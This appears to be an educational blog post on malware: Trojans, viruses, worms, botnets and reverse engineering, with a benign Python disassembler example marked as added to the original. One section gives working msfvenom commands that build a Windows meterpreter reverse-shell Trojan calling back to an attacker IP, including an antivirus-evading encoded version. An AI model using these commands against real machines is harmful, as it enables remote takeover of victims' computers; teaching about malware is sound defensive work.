Malware Threats in Cyber Security. What actually it is?

Malware Overview

Malware is malicious software that damages or disables computer systems and gives the malware creator limited or full control of those systems, typically for theft or fraud.

  • Malware (Malicious Software) is a “catch-all” term for code or a program that is hostile and harmful to computer applications, hardware and infrastructure.
  • Malware can take many different forms and perform many different functions.
  • Viruses, Worms, Trojans, Rootkits, Spyware, Adware and Ransomware are all types of malware.

Trojan Concepts

  • A Trojan is a type of malicious code or software that looks legitimate but can take control of your computer.
  • A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network. Once installed, a Trojan can perform the action it was designed for.
  • Trojans are activated when the user performs certain predefined actions.

How Hackers Use Trojans?

  • Delete or replace the operating system’s critical files.
  • Record screenshots, audio and video on the victim’s PC.
  • Use the victim’s PC for spamming and mass-mailing email messages.
  • Download spyware, adware and other malicious files.
  • Disable firewalls and antivirus software.
  • Create backdoors to gain remote access.
  • Enlist the victim’s PC in a botnet to perform DDoS attacks.
  • Steal information such as passwords, security codes and credit card details using keyloggers.

How to Create Trojans in Kali Linux: msfvenom

Attacker Host IP = 192.168.1.103

Create Trojan with msfvenom

msfvenom -p [payload] LHOST=[Your IP address] LPORT=[Port number] -f [file type] > [path]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe > trojan1.exe

Encode your Trojan with the Shikata_ga_nai encoder

msfvenom -p [payload] LHOST=[your IP address] LPORT=[the port number] -e [encoder] -i [number of encoding iterations] -f [file type] > [path]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe > encryptedtrojan.exe

Virus and Worm Concepts

  • A computer virus is a type of malware that propagates by inserting a copy of itself into, and becoming part of, another program. It spreads from one computer to another, leaving infections as it travels.
  • Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program.
  • Worms are standalone software and do not require a host program or human help to propagate.

Why Do People Create Viruses?

  • Inflict damage on competitors
  • Financial benefits
  • Research projects
  • Pranks
  • Vandalism
  • Cyber terrorism
  • Distribute political messages

Stages of Virus Life

  • Design: Developing virus code using programming languages or construction kits.
  • Replication: The virus replicates for a period of time within the target system and then spreads itself.
  • Launch: It gets activated when the user performs certain actions, such as running an infected program.
  • Detection: The virus is identified as a threat infecting target systems.
  • Incorporation: Antivirus software developers assimilate defenses against the virus.
  • Elimination: Users install antivirus updates and eliminate the virus threat.

Zombie: What Is It?

“A bot is a type of malware which allows an attacker to gain complete control over the affected computer. Computers that are infected with a bot are generally referred to as ‘zombies’.”

“Networks of zombie computers are referred to as botnets.”

Malware Reverse Engineering

  • Reverse engineering has long been the leading method for understanding how malicious programs operate and what they’re engineered to do. Reverse engineering as a process has evolved as malware has become more sophisticated and detection tools have improved, but it remains critical.
  • Reverse engineering malware involves disassembling (and sometimes decompiling) a software program.
  • Through this process, binary instructions are converted to code mnemonics (or higher-level constructs) so that engineers can look at what the program does and what systems it impacts.
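To make the "binary instructions to mnemonics" step concrete, here is an added example (not code from the original post): a tiny linear-sweep disassembler that handles a handful of 32-bit x86 opcodes and is run over a constructed, harmless byte string. Real analysis tools (objdump, Ghidra, IDA, radare2) cover the full instruction set; this only illustrates the decoding idea and marks anything it does not know as a raw byte.

```python
import struct

# 32-bit general-purpose registers indexed by the 3-bit register field.
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def decode_one(code: bytes, offset: int):
    """Decode one instruction at `offset`; return (length, mnemonic text)."""
    op = code[offset]
    remaining = len(code) - offset
    if op == 0x90:
        return 1, "nop"
    if op == 0xC3:
        return 1, "ret"
    if op == 0xCC:
        return 1, "int3"
    if 0x50 <= op <= 0x57:                       # push r32 (register in opcode)
        return 1, f"push {REGS32[op - 0x50]}"
    if 0x58 <= op <= 0x5F:                       # pop r32
        return 1, f"pop {REGS32[op - 0x58]}"
    if 0xB8 <= op <= 0xBF and remaining >= 5:    # mov r32, imm32 (little-endian)
        imm = struct.unpack_from("<I", code, offset + 1)[0]
        return 5, f"mov {REGS32[op - 0xB8]}, 0x{imm:x}"
    if op == 0x31 and remaining >= 2:            # xor r/m32, r32 (register form only)
        modrm = code[offset + 1]
        if modrm >> 6 == 3:                      # mod == 11b: both operands are registers
            return 2, f"xor {REGS32[modrm & 7]}, {REGS32[(modrm >> 3) & 7]}"
    if op == 0xE8 and remaining >= 5:            # call rel32, target relative to next instruction
        rel = struct.unpack_from("<i", code, offset + 1)[0]
        return 5, f"call 0x{offset + 5 + rel:x}"
    if op == 0xEB and remaining >= 2:            # jmp rel8
        rel = struct.unpack_from("<b", code, offset + 1)[0]
        return 2, f"jmp 0x{offset + 2 + rel:x}"
    # Unknown or truncated instruction: emit the byte and keep sweeping.
    return 1, f"db 0x{op:02x}  ; unknown opcode"

def disassemble(code: bytes):
    """Linear-sweep disassembly: returns a list of (offset, mnemonic) tuples."""
    out, off = [], 0
    while off < len(code):
        length, text = decode_one(code, off)
        out.append((off, text))
        off += length
    return out

# Constructed sample bytes (a harmless prologue/epilogue, not real malware).
SAMPLE = bytes([
    0x55,                          # push ebp
    0x31, 0xC0,                    # xor eax, eax
    0xB8, 0x78, 0x56, 0x34, 0x12,  # mov eax, 0x12345678
    0xE8, 0x02, 0x00, 0x00, 0x00,  # call +2  -> 0xf
    0xEB, 0x00,                    # jmp +0   -> 0xf
    0x5D,                          # pop ebp
    0xC3,                          # ret
])

if __name__ == "__main__":
    for off, text in disassemble(SAMPLE):
        print(f"{off:04x}: {text}")
```

Note that a linear sweep can be misled by data embedded in code; real disassemblers also follow control flow (recursive descent) to avoid decoding data as instructions.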

Malware Analysis Tools

About Author

ICT Byte